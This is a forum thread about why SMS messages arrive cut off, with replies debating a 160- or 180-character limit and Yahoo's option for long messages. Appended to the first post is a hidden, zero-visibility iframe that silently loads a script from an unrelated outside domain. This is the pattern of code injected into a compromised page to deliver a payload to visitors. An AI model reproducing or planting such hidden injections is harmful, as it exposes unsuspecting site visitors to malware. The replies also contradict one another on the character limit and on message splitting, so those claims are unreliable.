Sms

I don't know if these was addressed before, but I am going to ask anyway. I got some SMS messages from a friend, but they seem to be cut off. Is there a limit in text that I am not aware of? and if so, I have upgrade my software to 44 does this make any change? How would I get more ability to get more text?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I believe the limit for a text message is 180 characters, this includes your signature, if you use it. I dont think the upgrade has any affecton the text messages. If a message is too long, it will be sent in numerous messages.

SMS messages are limited to 160 characters, everything included, not 180. Try to send anything longer than 160 total characters and it will go through, but it will be truncated past 160 chars. Long messages will not be split up and sent as multiple messages.

Send a message via Yahoo to Walcwlr

I think it is an option somewhere. It might actually be on the Verizon site. I know I saw the choice of sending long messages as one message or having it broken into smaller messages... Now that I think of it, I think it was on Yahoo. I have Yahoo alerts set up and Yahoo gives you that option. I haven't tried it though. I have mine set to send everything as one message.
